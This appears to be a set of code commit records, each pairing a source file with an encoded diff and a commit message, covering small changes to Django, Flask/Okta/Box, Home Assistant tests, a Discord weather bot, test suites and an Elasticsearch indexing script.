colour_filters['colourdistance__distance__lte'] = DISTANCE
found_works = artworks.count()
colours = colours.filter(**colour_filters)
colours = colours.annotate(Count('artwork', distinct=True)).order_by('hue')
total_palette = reduce(
lambda x, y: x+y,
[c.artwork__count for c in colours]
)
colour_count = colours.count()
colour_width = 99.4 / colour_count
institutions = Artwork.objects.all().values('institution').distinct()
t = loader.get_template("colour.html")
context_data = {
'artworks': artworks[:40],
'colours': colours,
'colour_count': colour_count,
'colour_width': colour_width,
'total_palette': total_palette,
'found': found_works,
'institution': institution,
'institutions': institutions,
'req_colours': req_colours,
}
c = RequestContext(request, context_data)
return HttpResponse(t.render(c))
|
Python
| 0.000001
|
@@ -3084,24 +3084,26 @@
ate(%0A
+ #
ave_distanc
@@ -3144,16 +3144,74 @@
%0A
+ # tot_distance=Avg(%22colourdistance__distance%22),%0A #
ave_pre
@@ -3256,16 +3256,18 @@
%0A
+ #
tot_pre
@@ -3303,16 +3303,132 @@
esence%22)
+,%0A tot_prominence=Sum(%22colourdistance__prominence%22),%0A ave_prominence=Avg(%22colourdistance__prominence%22)
%0A )%0A%0A
@@ -3464,26 +3464,28 @@
_by('-tot_pr
-es
+omin
ence').disti
|
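Decoded, the presence- and distance-based aggregates are commented out, prominence-based ones are added, and the sort key follows suit; the touched block reads roughly:

    artworks = artworks.annotate(
        # ave_distance=Avg("colourdistance__distance"),
        # tot_distance=Avg("colourdistance__distance"),
        # ave_presence=Avg("colourdistance__presence"),
        # tot_presence=Sum("colourdistance__presence"),
        tot_prominence=Sum("colourdistance__prominence"),
        ave_prominence=Avg("colourdistance__prominence")
    )
    artworks = artworks.order_by('-tot_prominence').distinct()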
f61a4766ad3006bb2001df33d06feeb15352aa5a
|
Change Box user list request from raw API call to Box SDK make_request method
|
okta-integration/python/server.py
|
okta-integration/python/server.py
|
from flask import Flask, redirect, g, url_for
from flask_oidc import OpenIDConnect
from okta import UsersClient
from boxsdk import Client
from boxsdk import JWTAuth
import requests
import config
import json
app = Flask(__name__)
app.config.update({
'SECRET_KEY': config.okta_client_secret,
'OIDC_CLIENT_SECRETS': './client_secrets.json',
'OIDC_DEBUG': True,
'OIDC_ID_TOKEN_COOKIE_SECURE': False,
'OIDC_SCOPES': ["openid", "profile"],
'OIDC_CALLBACK_ROUTE': config.okta_callback_route
})
oidc = OpenIDConnect(app)
okta_client = UsersClient(config.okta_org_url, config.okta_auth_token)
# Fetch Okta user record if logged in
@app.before_request
def before_request():
if oidc.user_loggedin:
g.user = okta_client.get_user(oidc.user_getfield('sub'))
else:
g.user = None
# Main application route
@app.route('/')
def start():
return redirect(url_for(".box_auth"))
# Box user verification
@app.route("/box_auth")
@oidc.require_login
def box_auth():
uid = g.user.id
auth = JWTAuth.from_settings_file('../config.json')
access_token = auth.authenticate_instance()
box_client = Client(auth)
    # Validate if user exists
url = f'https://api.box.com/2.0/users?external_app_user_id={uid}'
headers = {'Authorization': 'Bearer ' + access_token}
response = requests.get(url, headers=headers)
user_info = response.json()
# If user not found, create user, otherwise fetch user token
if (user_info['total_count'] == 0):
user_name = f'{g.user.profile.firstName} {g.user.profile.lastName}'
space = 1073741824
# Create app user
user = box_client.create_user(user_name, None, space_amount=space, external_app_user_id=uid)
print('user {name} created')
else:
# Create user client based on discovered user
user = user_info['entries'][0]
user_to_impersonate = box_client.user(user_id=user['id'])
user_client = box_client.as_user(user_to_impersonate)
# Get current user
current_user = box_client.user().get()
print(current_user.id)
# Get all items in a folder
items = user_client.folder(folder_id='0').get_items()
for item in items:
print('{0} {1} is named "{2}"'.format(item.type.capitalize(), item.id, item.name))
return 'Test complete'
# User logout
@app.route("/logout")
def logout():
oidc.logout()
|
Python
| 0
|
@@ -983,16 +983,52 @@
ser.id%0A%0A
+ # Instantiate Box Client instance%0A
auth =
@@ -1077,54 +1077,8 @@
n')%0A
- access_token = auth.authenticate_instance()%0A
bo
@@ -1204,108 +1204,53 @@
'%0A
-headers = %7B'Authorization': 'Bearer ' + access_token%7D%0A response = requests.get(url, headers=headers
+response = box_client.make_request('GET', url
)%0A
@@ -2138,16 +2138,18 @@
name))%0A%0A
+
return
@@ -2165,16 +2165,18 @@
mplete'%0A
+
%0A# User
@@ -2233,9 +2233,8 @@
logout()
-%0A
|
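Decoded, the manual requests.get call with a Bearer header becomes a single authenticated SDK call, and the now-unused access_token line disappears; the lookup section reads roughly:

    uid = g.user.id

    # Instantiate Box Client instance
    auth = JWTAuth.from_settings_file('../config.json')
    box_client = Client(auth)

    url = f'https://api.box.com/2.0/users?external_app_user_id={uid}'
    response = box_client.make_request('GET', url)
    user_info = response.json()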
332cbbd8b1be773593037d293c5dabbf6c100199
|
Migrate freedns tests from coroutine to async/await (#30390)
|
tests/components/freedns/test_init.py
|
tests/components/freedns/test_init.py
|
"""Test the FreeDNS component."""
import asyncio
import pytest
from homeassistant.components import freedns
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from tests.common import async_fire_time_changed
ACCESS_TOKEN = "test_token"
UPDATE_INTERVAL = freedns.DEFAULT_INTERVAL
UPDATE_URL = freedns.UPDATE_URL
@pytest.fixture
def setup_freedns(hass, aioclient_mock):
"""Fixture that sets up FreeDNS."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="Successfully updated 1 domains."
)
hass.loop.run_until_complete(
async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
)
@asyncio.coroutine
def test_setup(hass, aioclient_mock):
"""Test setup works if update passes."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="ERROR: Address has not changed."
)
result = yield from async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert result
assert aioclient_mock.call_count == 1
async_fire_time_changed(hass, utcnow() + UPDATE_INTERVAL)
yield from hass.async_block_till_done()
assert aioclient_mock.call_count == 2
@asyncio.coroutine
def test_setup_fails_if_wrong_token(hass, aioclient_mock):
"""Test setup fails if first update fails through wrong token."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(UPDATE_URL, params=params, text="ERROR: Invalid update URL (2)")
result = yield from async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert not result
assert aioclient_mock.call_count == 1
|
Python
| 0
|
@@ -31,24 +31,8 @@
%22%22%22%0A
-import asyncio%0A%0A
impo
@@ -900,35 +900,22 @@
)%0A%0A%0A
-@
async
-io.coroutine%0A
+
def test
@@ -1149,34 +1149,29 @@
result =
-yield from
+await
async_setup
@@ -1514,26 +1514,21 @@
AL)%0A
-yield from
+await
hass.as
@@ -1597,27 +1597,14 @@
2%0A%0A%0A
-@
async
-io.coroutine%0A
+
def
@@ -1880,18 +1880,13 @@
t =
-yield from
+await
asy
|
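Decoded, the @asyncio.coroutine decorators and yield from expressions become native async def/await, and the asyncio import is dropped; the first migrated test reads:

async def test_setup(hass, aioclient_mock):
    """Test setup works if update passes."""
    params = {}
    params[ACCESS_TOKEN] = ""
    aioclient_mock.get(
        UPDATE_URL, params=params, text="ERROR: Address has not changed."
    )
    result = await async_setup_component(
        hass,
        freedns.DOMAIN,
        {
            freedns.DOMAIN: {
                "access_token": ACCESS_TOKEN,
                "scan_interval": UPDATE_INTERVAL,
            }
        },
    )
    assert result
    assert aioclient_mock.call_count == 1

    async_fire_time_changed(hass, utcnow() + UPDATE_INTERVAL)
    await hass.async_block_till_done()
    assert aioclient_mock.call_count == 2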
0c5ab1d1b09dd77cd2052f9f4cbad3c7bbf5b8ef
|
Fix failing von mises tests on CUDA (#1747)
|
tests/distributions/test_von_mises.py
|
tests/distributions/test_von_mises.py
|
from __future__ import absolute_import, division, print_function
import math
import pytest
import torch
from torch import optim
from pyro.distributions import VonMises, VonMises3D
from pyro.distributions.von_mises import _log_modified_bessel_fn
def _fit_params_from_samples(samples, n_iter):
assert samples.dim() == 1
samples_count = samples.size(0)
samples_cs = samples.cos().sum()
samples_ss = samples.sin().sum()
mu = torch.atan2(samples_ss / samples_count, samples_cs / samples_count)
samples_r = (samples_cs ** 2 + samples_ss ** 2).sqrt() / samples_count
# From Banerjee, Arindam, et al.
# "Clustering on the unit hypersphere using von Mises-Fisher distributions."
# Journal of Machine Learning Research 6.Sep (2005): 1345-1382.
# By mic (https://stats.stackexchange.com/users/67168/mic),
# Estimating kappa of von Mises distribution, URL (version: 2015-06-12):
# https://stats.stackexchange.com/q/156692
kappa = (samples_r * 2 - samples_r ** 3) / (1 - samples_r ** 2)
lr = 1e-2
kappa.requires_grad = True
bfgs = optim.LBFGS([kappa], lr=lr)
def bfgs_closure():
bfgs.zero_grad()
obj = (_log_modified_bessel_fn(kappa, order=1)
- _log_modified_bessel_fn(kappa, order=0))
obj = (obj - samples_r.log()).abs()
obj.backward()
return obj
for i in range(n_iter):
bfgs.step(bfgs_closure)
return mu, kappa.detach()
@pytest.mark.parametrize('loc', [-math.pi/2.0, 0.0, math.pi/2.0])
@pytest.mark.parametrize('concentration', [0.01, 0.03, 0.1, 0.3, 1.0, 3.0, 10.0, 30.0, 100.0])
def test_sample(loc, concentration, n_samples=int(1e6), n_iter=100):
prob = VonMises(loc, concentration)
samples = prob.sample((n_samples,))
mu, kappa = _fit_params_from_samples(samples, n_iter=n_iter)
assert abs(loc - mu) < 0.1
assert abs(concentration - kappa) < concentration * 0.1
@pytest.mark.parametrize('concentration', [0.01, 0.03, 0.1, 0.3, 1.0, 3.0, 10.0, 30.0, 100.0])
def test_log_prob_normalized(concentration):
grid = torch.arange(0., 2 * math.pi, 1e-4)
prob = VonMises(0.0, concentration).log_prob(grid).exp()
norm = prob.mean().item() * 2 * math.pi
assert abs(norm - 1) < 1e-3, norm
@pytest.mark.parametrize('scale', [0.1, 0.5, 0.9, 1.0, 1.1, 2.0, 10.0])
def test_von_mises_3d(scale):
concentration = torch.randn(3)
concentration = concentration * (scale / concentration.norm(2))
num_samples = 100000
samples = torch.randn(num_samples, 3)
samples = samples / samples.norm(2, dim=-1, keepdim=True)
d = VonMises3D(concentration, validate_args=True)
actual_total = d.log_prob(samples).exp().mean()
expected_total = 1 / (4 * math.pi)
ratio = actual_total / expected_total
assert torch.abs(ratio - 1) < 0.01, ratio
|
Python
| 0
|
@@ -70,16 +70,26 @@
ort math
+%0Aimport os
%0A%0Aimport
@@ -251,16 +251,54 @@
ssel_fn%0A
+from tests.common import skipif_param%0A
%0A%0Adef _f
@@ -1599,37 +1599,212 @@
oncentration', %5B
-0.01,
+skipif_param(0.01, condition='CUDA_TEST' in os.environ,%0A reason='low precision.'),%0A
0.03, 0.1, 0.3,
@@ -1897,18 +1897,17 @@
n_iter=
-10
+5
0):%0A
|
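Decoded, the fix imports os and skipif_param, skips the lowest concentration when running under CUDA, and halves the default n_iter; test_sample's parametrization ends up roughly as:

import os
from tests.common import skipif_param

@pytest.mark.parametrize('loc', [-math.pi/2.0, 0.0, math.pi/2.0])
@pytest.mark.parametrize('concentration', [
    skipif_param(0.01, condition='CUDA_TEST' in os.environ,
                 reason='low precision.'),
    0.03, 0.1, 0.3, 1.0, 3.0, 10.0, 30.0, 100.0])
def test_sample(loc, concentration, n_samples=int(1e6), n_iter=50):
    prob = VonMises(loc, concentration)
    samples = prob.sample((n_samples,))
    mu, kappa = _fit_params_from_samples(samples, n_iter=n_iter)
    assert abs(loc - mu) < 0.1
    assert abs(concentration - kappa) < concentration * 0.1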
70f198f6148f5edbef0af77d6959171265abc248
|
remove uvindex
|
commands/weather.py
|
commands/weather.py
|
#import forecastiopy
import geocoder
import json
import discord
import datetime
from forecastiopy import *
from darksky import forecast
from discord.ext import commands
from utils.sharding import darkskyapi
api_key = darkskyapi
class Weather():
def __init__(self, bot):
self.bot = bot
@commands.command()
async def weather(self, ctx, *, address: str):
"""Dark Sky Weather Results"""
if ctx.message.author == ctx.message.author: #filler
try:
g = geocoder.google(address)
results = g.latlng
loc = g.address
#if any(sin in address for sin in the_sin):
# theresult = True
#else:
# theresult = False
if ", USA" in loc:
thedisplay = True
thevariable = True
elif ", USA" not in loc:
thedisplay = False
thevariable = False
if ", UK" in loc:
print("Passing as United Kingdom")
fio = ForecastIO.ForecastIO(api_key, latitude=results[0], longitude=results[1], units=ForecastIO.ForecastIO.UNITS_UK)
if ", Canada" in loc:
print("Passing as Canada")
fio = ForecastIO.ForecastIO(api_key, latitude=results[0], longitude=results[1], units=ForecastIO.ForecastIO.UNITS_CA)
else:
print("Passing with an automatic unit")
fio = ForecastIO.ForecastIO(api_key, latitude=results[0], longitude=results[1])
current = FIOCurrently.FIOCurrently(fio)
ds = forecast(api_key, int(results[0]), int(results[1]))
if thedisplay == True:
print("The display passed")
em = discord.Embed(description="This information is displayed in Farenheit.")
elif thedisplay == False:
print("The display didn't pass")
em = discord.Embed(description="This information is displayed in Celcius.")
em.title = "{}'s Current Weather".format(loc)
if current.uvIndex == 0:
uvresult = "There probably isn't any sun right now."
uvint = "0"
elif current.uvIndex == range(1, 5):
uvresult = "Few sun rays are hitting."
uvint = current.uvIndex
elif current.uvIndex == range(5, 8):
uvresult = "Hm.. The sun might be a bit stronk. Wear sunscreen if you're going out."
uvint = current.uvIndex
elif current.uvIndex == range(8, 15):
uvresult = "Damn, the sun rays are hitting good here! Wear sunscreen definitely!"
uvint = current.uvIndex
else:
uvresult = "Not available."
uvint = "N/A"
try:
visib = current.visibility
except AttributeError:
visib = "N/A"
if ctx.me.color == None:
maybe = None
else:
maybe = ctx.me.color
try:
expiretime = datetime.datetime.fromtimestamp(int(ds.alerts[0].expires)).strftime('%A %B %d, %Y %I:%M %Z')
print("expire time passed")
counties = ', '.join(ds.alerts[0].regions)
print("joining counties passed")
alertresult = "{} in {}, expiring at {}. More info [at NWS]({} 'National Weather Service')".format(ds.alerts[0].title, counties, expiretime, ds.alerts[0].uri)
print("alert setup complete")
except Exception as e:
alertresult = e
em.set_thumbnail(url="https://dragonfire.me/474be77b-23bc-42e4-a779-6eb7b3b9a892.jpg")
em.color = maybe
if thevariable == True:
print("The variable passed")
em.add_field(name='Temperature', value="{}°F".format(current.temperature), inline=True)
elif thevariable == False:
print("The variable didn't pass")
em.add_field(name='Temperature', value="{}°C".format(current.temperature), inline=True)
em.add_field(name='Currently', value="{}".format(current.summary), inline=True)
em.add_field(name='Humidity', value="{:.0%}".format(current.humidity), inline=True)
#this is a bit tricky when it comes to some countries so i'll leave it as is
if ", UK" in loc:
print("speeds as UK")
em.add_field(name='Wind Speed/Gust (imperial)', value="{} mph/{} mph".format(current.windSpeed, current.windGust), inline=True)
if ", USA" in loc:
print("speeds as America")
em.add_field(name='Wind Speed/Wind Gust', value="{} mph/{} mph".format(current.windSpeed, current.windGust), inline=True)
else:
print("speeds in Metric (automatic)")
em.add_field(name='Wind Speed/Gust', value="{} km/h/{} km/h".format(current.windSpeed, current.windGust), inline=True)
#same for this
if ", UK" in loc:
print("visibilty as UK")
em.add_field(name='Visibility (imperial)', value="{} miles".format(visib), inline=True)
if ", USA" in loc:
print("visibility as America")
em.add_field(name='Visibility', value="{} miles".format(visib), inline=True)
else:
print("visibility in Metric (automatic)")
em.add_field(name='Visibility', value="{} kilometers".format(visib), inline=True)
em.add_field(name='UV Index', value="{} Current index is **{}**.".format(uvresult, uvint), inline=True)
if fio.has_alerts() is True:
em.add_field(name='Weather Alert', value=alertresult, inline=True)
await ctx.send(embed=em)
except Exception as fucking_hell:
await ctx.send("```py\n{}\n```".format(fucking_hell))
else:
await ctx.send("Location isn't found or the given zip code or address is too short. Try again.")
@commands.command()
async def locate(self, ctx, *, address: str):
"""Go fucking stalk someone"""
try:
g = geocoder.google(address)
loc = g.json
var = json.dumps(loc)
k = json.loads(var)
if k['status'] == 'OK':
yes = k['address']
elif k['status'] == 'ZERO_RESULTS':
yes = "There's no results found for this location."
await ctx.send(yes)
except Exception as e:
await ctx.send("```py\n{}\n```".format(e))
def setup(bot):
bot.add_cog(Weather(bot))
|
Python
| 0.997691
|
@@ -2194,816 +2194,8 @@
oc)%0A
- if current.uvIndex == 0:%0A uvresult = %22There probably isn't any sun right now.%22%0A uvint = %220%22%0A elif current.uvIndex == range(1, 5):%0A uvresult = %22Few sun rays are hitting.%22%0A uvint = current.uvIndex%0A elif current.uvIndex == range(5, 8):%0A uvresult = %22Hm.. The sun might be a bit stronk. Wear sunscreen if you're going out.%22%0A uvint = current.uvIndex%0A elif current.uvIndex == range(8, 15):%0A uvresult = %22Damn, the sun rays are hitting good here! Wear sunscreen definitely!%22%0A uvint = current.uvIndex%0A else:%0A uvresult = %22Not available.%22%0A uvint = %22N/A%22%0A
@@ -5168,128 +5168,8 @@
ue)%0A
- em.add_field(name='UV Index', value=%22%7B%7D Current index is **%7B%7D**.%22.format(uvresult, uvint), inline=True)%0A
|
72941398fd2e78cbf5d994b4bf8683c4bdefaab9
|
Comment out semipar notebook in travis runner until pip build is updated.
|
utils/travis_runner.py
|
utils/travis_runner.py
|
#!/usr/bin/env python
"""This script manages all tasks for the TRAVIS build server."""
import os
import subprocess
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"grmpy_tutorial_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
os.chdir("../..")
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"tutorial_semipar_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
|
Python
| 0
|
@@ -405,16 +405,18 @@
/..%22)%0A%0A%0A
+#
if __nam
@@ -426,32 +426,34 @@
== %22__main__%22:%0A
+#
os.chdir(%22pr
@@ -482,36 +482,38 @@
_notebook%22)%0A
+#
+
cmd = %5B%0A
%22jup
@@ -492,32 +492,34 @@
)%0A# cmd = %5B%0A
+#
%22jupyter
@@ -513,32 +513,34 @@
%22jupyter%22,%0A
+#
%22nbconve
@@ -536,32 +536,34 @@
%22nbconvert%22,%0A
+#
%22--execu
@@ -559,32 +559,34 @@
%22--execute%22,%0A
+#
%22tutoria
@@ -608,32 +608,33 @@
ook.ipynb%22,%0A
+#
%22--ExecutePr
@@ -613,32 +613,33 @@
pynb%22,%0A#
+
%22--ExecutePrepro
@@ -650,38 +650,42 @@
or.timeout=-1%22,%0A
+#
%5D%0A
+#
subprocess.c
|
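Decoded, the grmpy tutorial block is left alone and the semipar block is commented out wholesale:

# if __name__ == "__main__":
#     os.chdir("promotion/grmpy_tutorial_notebook")
#     cmd = [
#         "jupyter",
#         "nbconvert",
#         "--execute",
#         "tutorial_semipar_notebook.ipynb",
#         "--ExecutePreprocessor.timeout=-1",
#     ]
#     subprocess.check_call(cmd)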
1f2c175d00729902a953513436879b08a0e3baa3
|
test must have broken with upgrade (change in random seed?) so this fixes it
|
tests/mep/genetics/test_chromosome.py
|
tests/mep/genetics/test_chromosome.py
|
import unittest
import random
from mep.genetics.gene import VariableGene, OperatorGene, Gene
from mep.genetics.chromosome import Chromosome
import numpy as np
class MockedGene(Gene):
def __init__(self, error_to_return):
"""
Initialize.
:param error_to_return: what to return in the evaluate
:type error_to_return: float
"""
self.error_to_return = error_to_return
def evaluate(self, gene_index, eval_matrix, data_matrix, constants, targets):
"""
Simple mocked version.
"""
return self.error_to_return
class TestChromosome(unittest.TestCase):
"""
Tests for the chromosome.
"""
def test_basic_random_construction(self):
"""
Basic example of a construction.
"""
# set the seed to keep it reproducible
random.seed(0)
# create the chromosome
num_genes = 2
num_constants = 1
chromosome = Chromosome.generate_random_chromosome(num_constants=num_constants, constants_min=1,
constants_max=10, constants_prob=0.2,
feature_variable_prob=0.3,
num_feature_variables=2, num_genes=num_genes,
operators_prob=0.5)
# confirm the number of genes and constants match what we expect
self.assertEquals(num_genes, len(chromosome.genes))
self.assertEquals(num_constants, len(chromosome.constants))
# the first gene has to be a variable gene; in particular it is this one
self.assertEquals(VariableGene(0, is_feature=False), chromosome.genes[0])
# the 2nd gene can be a variable or an operator; in this case it is the below
self.assertEquals(OperatorGene(Chromosome.operators_family[2](), 0, 0), chromosome.genes[1])
# verify constant
self.assertAlmostEquals(8.599796663725433, chromosome.constants[0])
def test_evaluate(self):
"""
Basic test of the evaluate method.
"""
# construct mocked genes
genes = [MockedGene(10), MockedGene(1)]
# construct chromosome
chromosome = Chromosome(genes, constants=[1, 2, 3])
# evaluate
chromosome.evaluate(np.zeros((2, 2)), targets=[20, 30])
# confirm the genes
self.assertEqual(genes[1], genes[chromosome.best_gene_index])
self.assertEqual(genes[1].error_to_return, chromosome.error)
def test_sort(self):
"""
Test the sort mechanism.
"""
# construct the chromosomes and test sorting them (by error)
min_chromosome, mid_chromosome, max_chromosome = Chromosome([], []), Chromosome([], []), Chromosome([], [])
min_chromosome.error = 1
mid_chromosome.error = 2
max_chromosome.error = 3
chromosomes = [mid_chromosome, max_chromosome, min_chromosome]
expected_chromosomes = [min_chromosome, mid_chromosome, max_chromosome]
# do the sort and verify
chromosomes.sort()
self.assertEqual(expected_chromosomes, chromosomes)
|
Python
| 0
|
@@ -1502,25 +1502,24 @@
.assertEqual
-s
(num_genes,
@@ -1565,17 +1565,16 @@
ertEqual
-s
(num_con
@@ -1714,17 +1714,16 @@
ertEqual
-s
(Variabl
@@ -1882,17 +1882,16 @@
ertEqual
-s
(Operato
@@ -1924,17 +1924,17 @@
_family%5B
-2
+4
%5D(), 0,
@@ -2015,17 +2015,16 @@
ostEqual
-s
(8.59979
|
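Decoded, the deprecated assertEquals/assertAlmostEquals aliases become assertEqual/assertAlmostEqual, and the expected operator index moves from 2 to 4 (tracking the changed random draw); the updated assertions read:

        self.assertEqual(num_genes, len(chromosome.genes))
        self.assertEqual(num_constants, len(chromosome.constants))
        self.assertEqual(VariableGene(0, is_feature=False), chromosome.genes[0])
        self.assertEqual(OperatorGene(Chromosome.operators_family[4](), 0, 0), chromosome.genes[1])
        self.assertAlmostEqual(8.599796663725433, chromosome.constants[0])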
17dfc3faa45584200c8f67686b86b541a2ce01fe
|
Test for informal word
|
revscoring/languages/tests/test_hebrew.py
|
revscoring/languages/tests/test_hebrew.py
|
from nose.tools import eq_
from .. import language, hebrew
def test_language():
is_misspelled = hebrew.solve(language.is_misspelled)
assert is_misspelled("חטול")
assert not is_misspelled("חתול")
is_badword = hebrew.solve(language.is_badword)
assert is_badword("שרמוטה")
assert not is_badword("שימרותה")
|
Python
| 0.000037
|
@@ -323,12 +323,154 @@
(%22%D7%A9%D7%99%D7%9E%D7%A8%D7%95%D7%AA%D7%94%22)%0A
+%0A is_informal_word = hebrew.solve(language.is_informal_word)%0A%0A assert is_informal_word(%22%D7%91%D7%92%D7%9C%D7%9C%D7%9A%22)%0A assert not is_informal_word(%22%D7%91%D7%92%D7%9C%D7%9C%22)%0A
|
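Decoded from the %-escapes, the added lines exercise the informal-word check the same way as the badword check:

    is_informal_word = hebrew.solve(language.is_informal_word)

    assert is_informal_word("בגללך")
    assert not is_informal_word("בגלל")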
1b75a0e5ee01387c434922b9d0fd23705cbafe9b
|
Allow empty enums for `OneOf`
|
marshmallow_jsonschema/validation.py
|
marshmallow_jsonschema/validation.py
|
from marshmallow import fields
from .exceptions import UnsupportedValueError
def handle_length(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Length``, setting the
values appropriately for ``fields.List``, ``fields.Nested``, and
``fields.String``.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
Raises:
UnsupportedValueError: Raised if the `field` is something other than
`fields.List`, `fields.Nested`, or `fields.String`
"""
if isinstance(field, fields.String):
minKey = "minLength"
maxKey = "maxLength"
elif isinstance(field, (fields.List, fields.Nested)):
minKey = "minItems"
maxKey = "maxItems"
else:
raise UnsupportedValueError(
"In order to set the Length validator for JSON "
"schema, the field must be either a List, Nested or a String"
)
if validator.min:
schema[minKey] = validator.min
if validator.max:
schema[maxKey] = validator.max
if validator.equal:
schema[minKey] = validator.equal
schema[maxKey] = validator.equal
return schema
def handle_one_of(schema, field, validator, parent_schema):
"""Adds the validation logic for ``marshmallow.validate.OneOf`` by setting
the JSONSchema `enum` property to the allowed choices in the validator.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.OneOf): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
"""
if validator.choices:
schema["enum"] = list(validator.choices)
schema["enumNames"] = list(validator.labels)
return schema
def handle_range(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Range``, setting the
values appropriately ``fields.Number`` and it's subclasses.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
"""
if not isinstance(field, fields.Number):
return schema
if validator.min:
schema["minimum"] = validator.min
if validator.max:
schema["maximum"] = validator.max
return schema
|
Python
| 0.000011
|
@@ -2392,38 +2392,25 @@
dict:
-A, possibly, n
+N
ew JSON Sche
@@ -2478,38 +2478,8 @@
%22%22%22%0A
- if validator.choices:%0A
@@ -2519,20 +2519,16 @@
hoices)%0A
-
sche
|
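Decoded, handle_one_of loses its truthiness guard (and its docstring drops the "possibly" hedge), so an empty choices tuple now yields empty enum/enumNames lists instead of omitting them:

def handle_one_of(schema, field, validator, parent_schema):
    schema["enum"] = list(validator.choices)
    schema["enumNames"] = list(validator.labels)
    return schema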
eb71d45097e509273518b83113489911bf985e4a
|
clean up
|
mcpipy/test/builders/test_protein.py
|
mcpipy/test/builders/test_protein.py
|
import pandas as pd
from cellcraft.builders.protein import define_items_color_texture_protein, store_location_biological_prot_data
def test_define_items_color_texture_protein():
dict_chains = {"a": 1, "b": 2}
d_appearance = define_items_color_texture_protein(dict_chains)
assert len(d_appearance) == 2
assert d_appearance[1]['color'] != d_appearance[2]['color']
def test_store_location_biological_prot_data():
complex_coordinates = pd.Series([0.03, 0.45, 0.23])
name = '1jsu'
data_dict = store_location_biological_prot_data(complex_coordinates, name)
|
Python
| 0.000001
|
@@ -377,205 +377,4 @@
r'%5D%0A
-%0Adef test_store_location_biological_prot_data():%0A complex_coordinates = pd.Series(%5B0.03, 0.45, 0.23%5D)%0A name = '1jsu'%0A data_dict = store_location_biological_prot_data(complex_coordinates, name)
|
34c901455f539ec9860c7704cc5f8cc8a09a8bca
|
Remove excessive logging from indexing script
|
scripts/process-g6-into-elastic-search.py
|
scripts/process-g6-into-elastic-search.py
|
#!/usr/bin/python
'''Process G6 JSON files into elasticsearch
This version reads JSON from disk or DM API and transforms this into the format
expected by the DM search.
Usage:
process-g6-into-elastic-search.py <es_endpoint> <dir_or_endpoint> [<token>]
Arguments:
es_endpoint Full ES index URL
dir_or_endpoint Directory path to import or an API URL if token is given
token Digital Marketplace API token
'''
import os
import sys
import json
import urllib2
CATEGORY_MAPPINGS = {
'Accounting and finance': '110',
'Business intelligence and analytics': '111',
'Collaboration': '112',
'Telecoms': '113',
'Customer relationship management (CRM)': '114',
'Creative and design': '115',
'Data management': '116',
'Sales': '117',
'Software development tools': '118',
'Electronic document and records management (EDRM)': '119',
'Human resources and employee management': '120',
'IT management': '121',
'Marketing': '122',
'Operations management': '123',
'Project management and planning': '124',
'Security': '125',
'Libraries': '126',
'Schools and education': '127',
'Energy and environment': '128',
'Healthcare': '129',
'Legal': '130',
'Transport and logistics': '131',
'Unlisted': '132',
'Compute': '133',
'Storage': '134',
'Other': '135',
'Platform as a service': '136',
'Planning': '137',
'Implementation': '138',
'Testing': '139',
'Training': '140',
'Ongoing support': '141',
'Specialist Cloud Services': '142'
}
def category_name_to_id(name):
return CATEGORY_MAPPINGS[name]
def g6_to_g5(data):
"""
Mappings
description == serviceSummary
name == serviceName
listingId == id
uniqueName == id
tags == []
enable == true
"""
categories = [category_name_to_id(t) for t in data.get('serviceTypes', [])]
return {
'uniqueName': data['id'],
'tags': data['lot'],
'name': data['serviceName'],
'listingId': str(data['id']),
'description': data['serviceSummary'],
'enabled': True,
'expired': False,
'details': {
'supplierId': data['supplierId'],
'lot': data['lot'],
'categories': categories,
'features': data['serviceFeatures'],
'benefits': data['serviceBenefits']
}
}
def post_to_es(es_endpoint, data):
handler = urllib2.HTTPHandler()
opener = urllib2.build_opener(handler)
json_data = g6_to_g5(data)
if not es_endpoint.endswith('/'):
es_endpoint += '/'
request = urllib2.Request(es_endpoint + json_data['listingId'],
data=json.dumps(json_data))
request.add_header("Content-Type", 'application/json')
print request.get_full_url()
print request.get_data()
try:
connection = opener.open(request)
except urllib2.HTTPError, e:
connection = e
print connection
# check. Substitute with appropriate HTTP code.
if connection.code == 200:
data = connection.read()
print str(connection.code) + " " + data
else:
print "connection.code = " + str(connection.code)
def request_services(endpoint, token):
handler = urllib2.HTTPBasicAuthHandler()
opener = urllib2.build_opener(handler)
page_url = endpoint
while page_url:
print "requesting {}".format(page_url)
request = urllib2.Request(page_url)
request.add_header("Authorization", "Bearer {}".format(token))
response = opener.open(request).read()
